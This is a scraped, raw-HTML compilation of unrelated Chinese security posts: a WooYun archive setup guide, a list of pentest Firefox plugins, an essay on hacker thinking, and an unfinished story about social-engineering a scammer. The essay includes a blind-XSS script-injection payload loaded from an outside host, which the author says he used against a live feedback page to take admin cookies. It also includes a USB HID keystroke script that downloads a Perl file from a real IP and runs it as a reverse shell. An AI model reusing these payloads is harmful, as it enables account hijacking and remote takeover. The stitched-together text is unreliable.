这里。&/p&&p&&img src=&/v2-efc19b467c4f179bf8e9da8c3f90a8ca_b.jpg& data-rawwidth=&796& data-rawheight=&265& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-efc19b467c4f179bf8e9da8c3f90a8ca_r.jpg&&5,在源码里找见 conn.php 这个文件,用记事本打开,或者想我一样下载了 notepad++ ,打开就是了,在里面修改成自己 MySQL 数据库的账号密码 。&/p&&p&&img src=&/v2-b9c9ffad07ad8a_b.jpg& data-rawwidth=&772& data-rawheight=&208& class=&origin_image zh-lightbox-thumb& width=&772& data-original=&/v2-b9c9ffad07ad8a_r.jpg&&&img src=&/v2-a7af61f7e09ee7d96b84ef93e4bb62fd_b.jpg& data-rawwidth=&777& data-rawheight=&193& class=&origin_image zh-lightbox-thumb& width=&777& data-original=&/v2-a7af61f7e09ee7d96b84ef93e4bb62fd_r.jpg&&6,然后把 wooyun.rar 拖进
D:\phpStudy\MySQL\data 这里解压下,这里是数据库存放的地方。&/p&&p&&img src=&/v2-4e3998dac5699cad4ce2_b.jpg& data-rawwidth=&796& data-rawheight=&382& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-4e3998dac5699cad4ce2_r.jpg&&7,启动 phpstudy ,然后点击面板上的选择版本,看下是不是 5.3 版本的,如果不是就选择到这个 5.3 版本 。(昨天就这个版本问题,害的我一连不上数据库。。。)&/p&&p&&img src=&/v2-7ca81c770a4c22f8ad37291edd6dc8c4_b.jpg& data-rawwidth=&838& data-rawheight=&395& class=&origin_image zh-lightbox-thumb& width=&838& data-original=&/v2-7ca81c770a4c22f8ad37291edd6dc8c4_r.jpg&&8,点击 mysql 管理器,站点域名管理,然后该杂弄杂弄。。。&/p&&p&&img src=&/v2-e1f98db6cdd64b7eb3a4b_b.jpg& data-rawwidth=&716& data-rawheight=&415& class=&origin_image zh-lightbox-thumb& width=&716& data-original=&/v2-e1f98db6cdd64b7eb3a4b_r.jpg&&&img src=&/v2-60ad89bec30f27e3de8fba_b.jpg& data-rawwidth=&948& data-rawheight=&546& class=&origin_image zh-lightbox-thumb& width=&948& data-original=&/v2-60ad89bec30f27e3de8fba_r.jpg&&9,一般到这里就结束了,直接启动服务器,然后然后输入 &i&127.0.0.1&/i& 就能进入了主页面了。&/p&&p&&img src=&/v2-9f9c1a4ccb719dddc6dc2f3f_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-9f9c1a4ccb719dddc6dc2f3f_r.jpg&&10,恩,先修改一个小错误,再继续说说其他的。他的源码不知道杂回事,进入具体的页面时就会在上面出现报错的提示。。。&/p&&p&&img src=&/v2-cc648b8daf693d61c28d5d_b.jpg& data-rawwidth=&1366& data-rawheight=&342& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-cc648b8daf693d61c28d5d_r.jpg&&10.1,看着挺不好看的,那我就关闭这个提醒吧,&br&&/p&&p&&img src=&/v2-8dfdc1dcdd68cb9dddc2c9a0_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-8dfdc1dcdd68cb9dddc2c9a0_r.jpg&&&img src=&/v2-897e9a9f0dc_b.jpg& data-rawwidth=&1364& data-rawheight=&329& class=&origin_image zh-lightbox-thumb& width=&1364& data-original=&/v2-897e9a9f0dc_r.jpg&&&b&# 额,那个其中有些步骤,需要多点击重启这个按钮的,就是把操作更新到设置中。。。反正最后多重启几下就好了。&/b&&br&&/p&&p&------------------------------------------------------------------------------------------------------------------------&/p&&p& 1,其他,如果修改域名的话,建议用管理员权限打开 phpstudy 这个工具 。&/p&&p&&img src=&/v2-7e87ef4dadf_b.jpg& data-rawwidth=&797& data-rawheight=&621& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-7e87ef4dadf_r.jpg&&2,继续来到域名管理的那个页面。&/p&&p&&img src=&/v2-bf8f346e68e6badedf42fa_b.jpg& data-rawwidth=&1137& data-rawheight=&548& class=&origin_image zh-lightbox-thumb& width=&1137& data-original=&/v2-bf8f346e68e6badedf42fa_r.jpg&&3,然后打开 hosts 这个文本。&/p&&p&&img src=&/v2-b54abe0f3f3_b.jpg& data-rawwidth=&1340& data-rawheight=&679& class=&origin_image zh-lightbox-thumb& width=&1340& data-original=&/v2-b54abe0f3f3_r.jpg&&4,添加自己的域名解析地址。&/p&&p&&img src=&/v2-2aef02b324bdf263f88d565f39eaaf7e_b.jpg& data-rawwidth=&796& data-rawheight=&570& class=&origin_image zh-lightbox-thumb& width=&796& data-original=&/v2-2aef02b324bdf263f88d565f39eaaf7e_r.jpg&&5,来看一下效果 。&/p&&p&&img src=&/v2-db24c00cd16eabe25bed8078_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-db24c00cd16eabe25bed8078_r.jpg&&-----------------------------------------------------------------------------------------------------------------------&/p&&p&1,下载了一下午的图片,终于下载到我电脑上了。那么开始吧。&/p&&p& 2,在 wuyun 源码里新建一个 upload 文件夹。&/p&&p&&img src=&/v2-5984caf9dacd3c48d80c_b.jpg& data-rawwidth=&1018& data-rawheight=&359& class=&origin_image zh-lightbox-thumb& width=&1018& data-original=&/v2-5984caf9dacd3c48d80c_r.jpg&&3,把这一堆的图片全部解压到 upload 这个文件夹里。&/p&&p&&img src=&/v2-594a2db8cccefa82423e32e_b.jpg& data-rawwidth=&797& data-rawheight=&621& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-594a2db8cccefa82423e32e_r.jpg&&&img src=&/v2-4f127b76e77dae34bcefef3e2be7ae3f_b.jpg& data-rawwidth=&797& data-rawheight=&622& class=&origin_image zh-lightbox-thumb& width=&797& data-original=&/v2-4f127b76e77dae34bcefef3e2be7ae3f_r.jpg&&&b&#&/b& 快一个小时了。。。。 关解压都能解压半个多小时,我也是醉醉的。。。&br&&/p&&p&4,继续用右键管理员权限运行
phpStudy.exe 。&/p&&p&5,继续 点击 MySQL 管理器,点击 站点域名管理 ,新增一个 static.loner.fm 域名,然后路径继续绑定到 wuyun 这个源码路径里,和一开始那个操作差不多,新增,保存。&/p&&p&&img src=&/v2-d0efbe3bcac51e106642eec_b.jpg& data-rawwidth=&1366& data-rawheight=&729& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-d0efbe3bcac51e106642eec_r.jpg&&6,继续点击 其他选项菜单,继续打开 hosts 这个文本 ,然后输入在原来的下一行输入以下地址,并保存&br&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&localhost
static.loner.fm
&/code&&/pre&&/div&&p&&img src=&/v2-e806dd998ddd0d2159aed75ab5255960_b.jpg& data-rawwidth=&1366& data-rawheight=&728& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-e806dd998ddd0d2159aed75ab5255960_r.jpg&&7,最后,启动下环境,输入地址,看下效果,是不是成功本地了。&/p&&p&&img src=&/v2-360c2adf507bfddcf6edbe50_b.jpg& data-rawwidth=&1366& data-rawheight=&512& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-360c2adf507bfddcf6edbe50_r.jpg&&&img src=&/v2-9fc0d39c6cbcefe403cd8d7f4bfe472b_b.jpg& data-rawwidth=&1366& data-rawheight=&342& class=&origin_image zh-lightbox-thumb& width=&1366& data-original=&/v2-9fc0d39c6cbcefe403cd8d7f4bfe472b_r.jpg&&--------------------------------------------------------------------------------------------------------------------------- &br&&/p&&p&&b&#
&/b&全文一步一步的写,我对我自己也是醉醉的。。。不过以后可以本地默默的看 8.8 w 的漏洞库的,嘎嘎。(*^__^*) 嘻嘻……&/p&
前段时间,老师在群里分享了一个 github 的连接,说开源了。我记得当时,看了看,才那么 几 百 M ,,,还 8.8 W = = !昨天,我一朋友自己直接搭自己硬盘上了,我就自己搭搭吧,很简单的,一放一点就成了。# 按我的风格,肯定要记录的详细的不能再详细了 …
&img src=&/50/v2-a1aed52d_b.jpg& data-rawwidth=&500& data-rawheight=&312& class=&origin_image zh-lightbox-thumb& width=&500& data-original=&/50/v2-a1aed52d_r.jpg&&&h2&&b&0x00 介绍&/b&&br&&/h2&&p&&b&本文由 一叶知安作者:倾旋 原创。未经许可,严禁转载!&/b&&/p&&p&写这篇文章对原因就是&b&:有很多朋友问我平常渗透测试的时候都用哪些好用的插件?&/b&&/p&&p&我一般都用火狐浏览器,有以下几点理由:&/p&&p&1.安装插件方便&/p&&p&2.快速同步&/p&&p&3.没有过滤的功能,测试某些漏洞比较方便&/p&&p&4.扩展性很强、灵活&/p&&p&可能有的朋友使用的是谷歌浏览器,但是谷歌浏览器下载插件确实比火狐要麻烦一点。&/p&&h2&&b&0x01 我推荐这些&/b&&/h2&&p&&b&HackBar&/b&&/p&&img src=&/50/v2-cb0a87bdcd01_b.png& data-rawwidth=&670& data-rawheight=&156& class=&origin_image zh-lightbox-thumb& width=&670& data-original=&/50/v2-cb0a87bdcd01_r.png&&&p&方便测试SQL注入、XSS漏洞,还有附带常见的编码解码功能,以及发送数据。&/p&&p&&br&&b&Easy Screenshot&/b&&/p&&img src=&/50/v2-cd16c08ed8dd7b04c6c66_b.png& data-rawwidth=&703& data-rawheight=&672& class=&origin_image zh-lightbox-thumb& width=&703& data-original=&/50/v2-cd16c08ed8dd7b04c6c66_r.png&&&p&一个截图的小工具。&/p&&p&&br&&b&HTTP Resource Test&/b&&/p&&img src=&/50/v2-b089d63fdf0_b.png& data-rawwidth=&597& data-rawheight=&767& class=&origin_image zh-lightbox-thumb& width=&597& data-original=&/50/v2-b089d63fdf0_r.png&&&p&用来测试常见的HTTP请求方法(POST,GET,DELETE,PUT,HEAD,OPTIONS,.....)可以自己修改方法。&br&&/p&&p&&b&HTTP Requester&/b&&/p&&img src=&/50/v2-8c05db6fdbd3e_b.png& data-rawwidth=&1207& data-rawheight=&805& class=&origin_image zh-lightbox-thumb& width=&1207& data-original=&/50/v2-8c05db6fdbd3e_r.png&&&p&用来测试常见的HTTP请求方法(POST,GET,DELETE,PUT,HEAD,OPTIONS,.....)可以自己修改方法。并且支持HTTP认证、保存请求、文件上传。&/p&&p&&br&&b&HttpFox&/b&&/p&&img src=&/50/v2-e28e4bfaf187c_b.png& data-rawwidth=&1392& data-rawheight=&469& class=&origin_image zh-lightbox-thumb& width=&1392& data-original=&/50/v2-e28e4bfaf187c_r.png&&&p&实时抓取HTTP请求 。&/p&&p&&br&&b&Modify Headers&/b&&/p&&img src=&/50/v2-a25ba41ed546_b.png& data-rawwidth=&650& data-rawheight=&505& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/50/v2-a25ba41ed546_r.png&&&p&添加或修改请求头,一般用于伪造IP地址。&/p&&p&&br&&b&Swap Proxy&/b&&/p&&img src=&/50/v2-0e23d581f123cbb1e0a5a0fe730474ce_b.png& data-rawwidth=&527& data-rawheight=&356& class=&origin_image zh-lightbox-thumb& width=&527& data-original=&/50/v2-0e23d581f123cbb1e0a5a0fe730474ce_r.png&&&p&为每个请求设置HTTP代理,优点就是不用再去打开浏览器设置,一个单击搞定。&/p&&p&&br&&b&Tamper Data&/b&&/p&&img src=&/50/v2-5dfd3ecd045f_b.png& data-rawwidth=&1484& data-rawheight=&466& class=&origin_image zh-lightbox-thumb& width=&1484& data-original=&/50/v2-5dfd3ecd045f_r.png&&&p&用于篡改HTTP请求,规则可以自定义。&/p&&p&&b&User Agent Switcher &img src=&/50/v2-23b9f89ff1ab0f9642912_b.png& data-rawwidth=&658& data-rawheight=&620& class=&origin_image zh-lightbox-thumb& width=&658& data-original=&/50/v2-23b9f89ff1ab0f9642912_r.png&&&/b&&/p&&p&用于切换各类浏览器的User Agent。&/p&&p&&br&&b&Web Developer&/b&&/p&&img src=&/50/v2-d90b32c3597416dda0463_b.png& data-rawwidth=&777& data-rawheight=&406& class=&origin_image zh-lightbox-thumb& width=&777& data-original=&/50/v2-d90b32c3597416dda0463_r.png&&&p&可以增加、删除、更改cookie,调试静态页面、禁用JS脚本、查看网页i信息以及请求头。&/p&&h2&&b&0x02 HackBar详解&/b&&/h2&&p&不管怎么样,都要凑够字数是吧! 详情我们视频里见!&br&&/p&&p&&b&安装完毕是这样的: &/b&&/p&&p&&img src=&/50/v2-cb0a87bdcd01_b.png& data-rawwidth=&670& data-rawheight=&156& class=&origin_image zh-lightbox-thumb& width=&670& data-original=&/50/v2-cb0a87bdcd01_r.png&& 首先先介绍横向&b&第一排的下拉框&/b&:&/p&&p&&b&INT、 HEX、OCT、Alphabet、AlNum&/b& 分别代表了整数、十六进制、八进制、字母表、所有。&/p&&p&假设你的输入框中有a这个字符,然后你将下拉框调整为Alphabet,再点击右边的“&b&+&/b&”,接下来你就会发现字母a变成了字母b!&/p&&p&整数类型的话也是一样,必须调整为INT或者AlNum,它会帮助你自动增长。&/p&&p&&b&Load URL:&/b&将当前浏览器的地址栏url复制到输入框中。&/p&&p&&b&Split URL:&/b&按照&来分割提交参数,并且一个参数占一行。&/p&&p&&b&Execute:&/b&提交请求。
&/p&&p&&b&SQL:&/b&主要用于SQL注入辅助,支持MySQL、MSSQL、Oracle的字符简单转换,也能够根据输入的数字直接生成联合注入的语句、并且也可以替换空格为注释符。&/p&&p&&b&XSS:&/b&用于将字符转换成ASCII码、HTML实体符号,附带生成一个测试XSS漏洞的alert谈窗代码。&/p&&p&&b&Encryption:&/b&用于加密字符,支持MD5、SHA1、SHA-256、ROT13&/p&&p&&b&Encoding:&/b&用于编码字符, 支持URL编码、Base64编码、十六进制编码。&br&&/p&&p&&b&Other:&/b&分别是Addslashes(将特殊字符使用“\”转义)、Stripslashes(去除转义)、Strip spaces(去除空格)、Reverse(字符串反转)。&/p&&p&&b&Usefull strings:&/b&一些常量,包括(元周率、菲波那切数列、内存溢出...)&/p&&p&&b&Enable Post data:&/b&这里勾选上后,会有一个输入框,使用来提交POST数据的。&/p&&p&&b&Enable Referrer:&/b&HTTP请求中的上一个页面的来源地址 。(一般用于测试CSRF防御机制)&/p&&h2&&b&0x03 关于视频&/b&&br&&/h2&&p&由于火狐插件相关的介绍文章较多,我准备给大家录制一个小视频,来动手实践学习使用插件。&/p&&p&(1)如何安装插件&/p&&p&(2)优化浏览器界面&/p&&p&(3) 从地一个插件开始介绍...&/p&&p&(4)总结&br&&/p&&p&那么,视频出来后我会把网盘地址放到文末,希望大家多多支持!!&/p&&p&========================================================================= &br&&/p&&p&微云链接:&a href=&/?target=https%3A///8eb71534dadafc287da42& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/8eb715&/span&&span class=&invisible&&34dadafc287da42&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& (密码:WhXJCu)&/p&
0x00 介绍 本文由 一叶知安作者:倾旋 原创。未经许可,严禁转载!写这篇文章对原因就是:有很多朋友问我平常渗透测试的时候都用哪些好用的插件?我一般都用火狐浏览器,有以下几点理由:1.安装插件方便2.快速同步3.没有过滤的功能,测试某些漏洞比较方便4.…
&p&&b&作者 | 张祖优(Fooying)@云鼎实验室&/b&&br&&/p&&p&网络安全里经常说的一句话是未知攻焉知防,基本所有的安全人员也是一名黑客,在黑客攻击愈发普遍的今天,如何更好的防御黑客攻击?用句带有点哲学的话,成为黑客,只有成为黑客,像黑客一样思考,你才能知道从哪去防御黑客;很俗的一句话,但很实在!&/p&&p&看到了什么?&/p&&img src=&/50/v2-fbc98b204bd09c78fa634d9_b.jpg& data-rawwidth=&1076& data-rawheight=&416& class=&origin_image zh-lightbox-thumb& width=&1076& data-original=&/50/v2-fbc98b204bd09c78fa634d9_r.jpg&&&p&看到上图的第一直觉,你可以自己想下答案,问问自己看到了什么?&/p&&p&正常的思维,第一直观感受是中间那个很明显,很大的黑点,因为这个黑点最吸引大家的注意力,稍微看过一些哲学故事的同学可能会想到黑点周围白色的区域,是的,黑点只是其中一个小点,而黑点周围白色的部分则足够大;但是,我不知道有没有人的答案是白色再外面?文章区域再外面?或者整个浏览器?整个电脑屏幕?电脑外呢?其实想表达的也正是黑客的思维里,永远不是局限于可以看到的部分,而在于能够想到或者没想到的所有面。&/p&&p&其实这类同于攻击面!安全是木桶短板原理,木桶能装多少水不在于最长的那块板,而是最短的那块;而一个系统的安全程度不取决于安全做的多全,做的多高大上,而在于是否把那些最简单的问题处理掉?数据告诉我们,服务器入侵,除了漏洞之外最大途径是弱口令,而这就是一个根本没多少技术含量的方式,属于安全基线问题,就是同样的道理。对于黑客而言,攻击面不会局限于能够看到的点,而在于所有可能关联或者没关联的面,就比如渗透测试或者说APT,很多时候结合社工这个点能够取得很好的效果,成为一个绝佳的入侵渠道。所以,第一点,学会放开自己的思维与想象,发现和关注平时所容易忽略和没有看到的地方。&/p&&p&什么是黑客?&/p&&p&什么是黑客?我用八个字总结,突破创造,守正出奇。在我看来,黑客永远不是一个贬义词,黑客本身就是极客,对于黑客来说,这个世界充满好奇,这个世界有太多的东西可以探索,特别是网络的世界。&/p&&img src=&/50/v2-8f979b69b46d00d18d77a45beadf1ff8_b.png& data-rawwidth=&577& data-rawheight=&314& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/50/v2-8f979b69b46d00d18d77a45beadf1ff8_r.png&&&p&黑客是一个追求自由的群体,不喜欢受到条条框框的约束,总是喜欢突破这一切,突破同时也可能是一种创造,创造新的方法,新的方式,新的工具,新的东西,就比如上图,小学课本里的乌鸦喝水,在我们看来是一种很傻的行为,但未尝不是一种稳定传统的方式?在生活中很多的事不也正如此?或者说就网络上很多安全的措施有时候也是稳定起见,因为新的东西除了先进,有时候也会带来风险。而对于黑客来说,可能考虑的更不是这些,而是尝试,好奇一切。&/p&&p&对于黑客而言,也有自己的黑客精神,有自己要坚持和秉承的东西(地下黑客的原则可能不同于正常黑客),这就是守正,自由、共享、平等、互助;在Web安全的世界里,我们经常会提到一个词&猥琐&,或者说不仅限于Web安全,因为很多时候攻击的产生不是利用一个多厉害的漏洞,而在于猥琐的思路,几个定义为低危的小漏洞的组合也许威力比一个高危漏洞还大,这就取决于漏洞的组合使用,利用思路;这些&猥琐行为&就是一种出奇的表现。&/p&&p&了解黑客,成为黑客,才能更好的学会黑客的思考。&/p&&p&看到框就想X&/p&&img src=&/50/v2-ae22dee3741f2cbc7890a_b.png& data-rawwidth=&463& data-rawheight=&817& class=&origin_image zh-lightbox-thumb& width=&463& data-original=&/50/v2-ae22dee3741f2cbc7890a_r.png&&&p&这是一个意见反馈的界面,看到这样一个界面,大家会怎么做?对于普通人来说,这就是一个正常的意见提交框,用处就是提交反馈内容;大家想想黑客会怎么做?提交攻击代码,比如下面的代码:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&&/textarea&'&&&script src=http://t.cn/R63bUP9&&/script&
&/code&&/pre&&/div&&p&实际上,当时看到这样一个功能,我就这样做了。这是360手游客服中心手机版的一个页面,可以提交反馈意见,我当时就直接提交了上面的攻击代码,然后就攻击成功了(这其实是一次XSS盲打,什么是XSS盲打大家可以自行搜索或者看我之前发的文章)。由于这样的功能往往看反馈内容的都是系统的相关管理员,于是被攻击成功的也是管理员,通过XSS盲打可以直接拿到管理员登录的账号的Cookie等信息(下图就是盲打平台中收到的攻击成功返回的后台地址和管理员Cookie)。&/p&&img src=&/50/v2-7a3cd5c892b3d138c28c_b.png& data-rawwidth=&963& data-rawheight=&793& class=&origin_image zh-lightbox-thumb& width=&963& data-original=&/50/v2-7a3cd5c892b3d138c28c_r.png&&&p&当然,不仅限于这个页面,还有其他的:&/p&&img src=&/50/v2-0fa5d22f41a2b024eee6a2e3a5361409_b.png& data-rawwidth=&825& data-rawheight=&839& class=&origin_image zh-lightbox-thumb& width=&825& data-original=&/50/v2-0fa5d22f41a2b024eee6a2e3a5361409_r.png&&&p&这种行为总结而言,就是&看到框就想X&,这里的X也就是XSS的意思;其实这更多的是一种习惯和意识,在黑客的想法里,看到功能首先想到的不是使用,而是能不能利用,然后由于攻击做的多了,看到不同的功能和应用页面,自然就能意识到可能存在的问题,自然而然的就会去测试;经常会有很多人问,那些人在各种SRC提交的漏洞都是怎么挖的,是不是有神器?但是也不是每个人的安全测试工具都是神器啊!其实很多时候是在使用中发现漏洞!&/p&&p&不同的潜意识行为和想法,取决于不同的知识面和经验,也取决于不同的目的。&/p&&p&功能也是攻击方式&/p&&p&如果手机没电了,那么旁边如果其他人正好有电脑,借用其他人电脑的USB口给手机充电是一件很常见的事,但其实,只是插个数据线,也可以导致电脑被攻击,下面视频演示的是一部手机通过USB连接MAC电脑执行指定的命令(视频里是ifconfig)。&/p&&p&&a class=&video-box& href=&/?target=https%3A///x/page/q03959yfsxh.html& target=&_blank& data-video-id=&& data-video-playable=&& data-name=&手机物理攻击MAC预防演示-执行ifconfig命令_腾讯视频& data-poster=&/qqvideo_ori/0/q03959yfsxh_228_128/0& data-lens-id=&&&
&img class=&thumbnail& src=&/qqvideo_ori/0/q03959yfsxh_228_128/0&&&span class=&content&&
&span class=&title&&手机物理攻击MAC预防演示-执行ifconfig命令_腾讯视频&span class=&z-ico-extern-gray&&&/span&&span class=&z-ico-extern-blue&&&/span&&/span&
&span class=&url&&&span class=&z-ico-video&&&/span&/x/page/q03959yfsxh.html&/span&
&br&&/p&&p&视频里的手机是一个很普通的手机,安装了一个叫做&Nethunter&的黑客操作系统,也就成为&黑客手机&,里面集成了一些黑客攻击工具,比如视频里演示的工具叫做DuckHunter HID。看到这个视频,大家是否会觉得这个攻击挺高端的,物理黑客攻击,但当我告诉大家原理之后,大家可能想到的就是&原来如此,这么简单&。&/p&&p&手机上显示的代码是:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&CONTROL SPACE
STRING iterm
ENTERENTER
&/code&&/pre&&/div&&p&看完这个代码不知道大家是否已经明白了攻击原理,熟悉MAC操作的同学可能知道CONTROL+SPACE其实是调起Spotlight,一个类似快捷启动的工具,然后输入iterm,就是查找iTerm,然后回车,打开iTerm后,再输入ifconfig,再回车,就完成了整个命令输入执行的过程;大家可以发现,这其实就是一个模拟键盘操作的过程,没错,上面视频演示的攻击原理就是模拟键盘操作,其实这时候的手机用USB接入电脑相其实就是把自己设置为键盘接入电脑,然后再直接模拟键盘操作进行攻击。&/p&&p&那么是否可以进行危害更大的攻击?比如反弹Shell?当然可以,改下代码即可:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&CONTROL SPACE
STRING iterm
ENTERENTER
STRING wget http://45.32.8.108/b.pl.txt -O /tmp/b.plSTRING perl /tmp/b.pl
反弹监听IP 监听端口
&/code&&/pre&&/div&&p&采用下载一个Perl脚本来实现反弹Shell,如下面视频:&/p&&p&&a class=&video-box& href=&/?target=https%3A///x/page/fe.html& target=&_blank& data-video-id=&& data-video-playable=&& data-name=&手机物理攻击防范视频_腾讯视频& data-poster=&/qqvideo_ori/0/fe_228_128/0& data-lens-id=&&&
&img class=&thumbnail& src=&/qqvideo_ori/0/fe_228_128/0&&&span class=&content&&
&span class=&title&&手机物理攻击防范视频_腾讯视频&span class=&z-ico-extern-gray&&&/span&&span class=&z-ico-extern-blue&&&/span&&/span&
&span class=&url&&&span class=&z-ico-video&&&/span&/x/page/fe.html&/span&
&br&&/p&&p&讲这个例子的目的其实就是这部分的标题,功能也是攻击方式。在黑客的眼里,不是一定得使用漏洞,使用多高端的技巧,能达到攻击目的和效果的方式都是好的攻击方式,这些方式不局限于大家所了解的只是漏洞或者暴力破解等,而经常做的就是利用正常的功能来实现攻击,这种攻击因为使用的是正常的功能,有时候反而更隐蔽;而类似的攻击方式,不在少数。&/p&&h2&结语&/h2&&p&其实,近几年来,大家对黑客的了解已经越来越多,黑客也越来越失去神秘,然后大家就会发现,他们其实也是生活中的普通人;而在黑夜中工作,有时更多的是因为那时候安静,做事效率高,或者是管理员不在线好做一些秘密的攻击和测试等,而不是所谓各种描述里的戴着衣帽,把自己包裹在黑暗中,不露出自己的真面目等。&/p&&p&其实黑客所不同于普通人的点,除了掌握的知识外,就是做事和思考的方式,仅此而已!&/p&&p&&b&相关阅读:&/b&&/p&&p&&a href=&/?target=https%3A///community/article/FfromSource%3Dgwzcw..93244& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&CIA泄露资料分析(黑客工具&技术)—Windows篇&i class=&icon-external&&&/i&&/a&&a href=&/?target=https%3A///community/article/FfromSource%3Dgwzcw..93206& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&MySQL成勒索新目标,数据服务基线安全问题迫在眉睫&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=https%3A///community/article/FfromSource%3Dgwzcw.947.106947& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&跨站的艺术-XSS Fuzzing 的技巧&i class=&icon-external&&&/i&&/a&&/p&
作者 | 张祖优(Fooying)@云鼎实验室 网络安全里经常说的一句话是未知攻焉知防,基本所有的安全人员也是一名黑客,在黑客攻击愈发普遍的今天,如何更好的防御黑客攻击?用句带有点哲学的话,成为黑客,只有成为黑客,像黑客一样思考,你才能知道从哪去防御黑…
&img src=&/50/v2-85b79d98c1d08a397f85c71fd81875ef_b.jpg& data-rawwidth=&960& data-rawheight=&426& class=&origin_image zh-lightbox-thumb& width=&960& data-original=&/50/v2-85b79d98c1d08a397f85c71fd81875ef_r.jpg&&&p&&strong&存好心,说好话,行好事,结好缘,做好人,人有善念,天必佑之&/strong&&/p&&p&&strong&
网络小捕快&/strong&&/p&&p&&strong&0X01&/strong&&/p&&p&&strong&粉丝的闺蜜怀疑男朋友出轨了 出轨了 出轨了 重要的事情说三遍&/strong&&/p&&br&&p&&strong&0X02&/strong&&/p&&br&&p&&strong&然后粉丝的闺蜜找了个能查出生到死亡的所有信息的黑客 黑客 黑客 &/strong&&/p&&p&&strong&帮忙查男朋友有没有出轨&/strong&&/p&&br&&p&&strong& 0X03&/strong&&/p&&br&&p&&strong&结果很显然就是被骗了 被骗了 被骗了&/strong&&/p&&br&&p&&strong&0X04&/strong&&/p&&br&&p&&strong&然后粉丝找到了我让我帮忙社工一波 社工 社工 社工&/strong&&/p&&img src=&/50/v2-028d48bc2ff4c002f04e49c7ef2c7404_b.jpg& data-rawwidth=&366& data-rawheight=&561& class=&content_image& width=&366&&&p&&b&0x05&/b&&/p&&br&&p&&b&必须没不行啊
不能你说是骗子他就是骗子了 &/b&&/p&&p&&b&得要有证据啊&/b&&/p&&br&&p&&b&0X06&/b&&/p&&br&&p&&b&粉丝发了聊天记录来了&/b&&/p&&p&&img src=&/50/v2-f86daaabf8d_b.jpg& data-rawwidth=&563& data-rawheight=&828& class=&origin_image zh-lightbox-thumb& width=&563& data-original=&/50/v2-f86daaabf8d_r.jpg&&&img src=&/50/v2-3fff5a32adbf26a28e35ef_b.jpg& data-rawwidth=&552& data-rawheight=&901& class=&origin_image zh-lightbox-thumb& width=&552& data-original=&/50/v2-3fff5a32adbf26a28e35ef_r.jpg&&&b&钱钱就这么打过去了 200+50就是250的定金&/b&&br&&/p&&img src=&/50/v2-ec53baa1549156eccaa02f1f2cf46d4c_b.jpg& data-rawwidth=&550& data-rawheight=&761& class=&origin_image zh-lightbox-thumb& width=&550& data-original=&/50/v2-ec53baa1549156eccaa02f1f2cf46d4c_r.jpg&&&img src=&/50/v2-ccae9b9d3bd64d8e897c_b.jpg& data-rawwidth=&560& data-rawheight=&672& class=&origin_image zh-lightbox-thumb& width=&560& data-original=&/50/v2-ccae9b9d3bd64d8e897c_r.jpg&&&img src=&/50/v2-1daa5bf20e0d_b.jpg& data-rawwidth=&552& data-rawheight=&834& class=&origin_image zh-lightbox-thumb& width=&552& data-original=&/50/v2-1daa5bf20e0d_r.jpg&&&img src=&/50/v2-0ccfd5c8264fcab5c35e08a9c4e502ec_b.jpg& data-rawwidth=&558& data-rawheight=&837& class=&origin_image zh-lightbox-thumb& width=&558& data-original=&/50/v2-0ccfd5c8264fcab5c35e08a9c4e502ec_r.jpg&&&img src=&/50/v2-50f82e4f8dff8cc480fd8e_b.jpg& data-rawwidth=&557& data-rawheight=&841& class=&origin_image zh-lightbox-thumb& width=&557& data-original=&/50/v2-50f82e4f8dff8cc480fd8e_r.jpg&&&img src=&/50/v2-e36bb761c4a5eaa95b12afb4_b.jpg& data-rawwidth=&555& data-rawheight=&825& class=&origin_image zh-lightbox-thumb& width=&555& data-original=&/50/v2-e36bb761c4a5eaa95b12afb4_r.jpg&&&p&&b&0X07&/b&&/p&&br&&p&&b&骗子果然有两下子 吧妹子骗得一愣一愣的 &/b&&/p&&p&&b&东西没查到不说还威胁妹子&/b&&/p&&p&&b&不交最后两百块钱就告诉渣男你在查他&/b&&/p&&p&&b&既然这样我先整理一下我的发型
在社工他 社工 社工 社工&/b&&/p&&img src=&/50/v2-baa3abf6f74ee_b.jpg& data-rawwidth=&153& data-rawheight=&188& class=&content_image& width=&153&&&p&&b&0X08&/b&&/p&&br&&p&&b&社工开始吧
在粉丝的强烈要求下我就直播社工了
在QQ群直播的&/b&&/p&&p&&b&既然骗子这么厉害我们先看看他能做那些 &/b&&/p&&img src=&/50/v2-ae5bf645dfa1c113539cad_b.jpg& data-rawwidth=&640& data-rawheight=&156& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/50/v2-ae5bf645dfa1c113539cad_r.jpg&&&img src=&/50/v2-f796e5cb8cfdec32a8d59a_b.jpg& data-rawwidth=&640& data-rawheight=&834& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&/50/v2-f796e5cb8cfdec32a8d59a_r.jpg&&&img src=&/50/v2-0e0dec1cedec6d0daca770_b.jpg& data-rawwidth=&800& data-rawheight=&425& class=&origin_image zh-lightbox-thumb& width=&800& data-original=&/50/v2-0e0dec1cedec6d0daca770_r.jpg&&&img 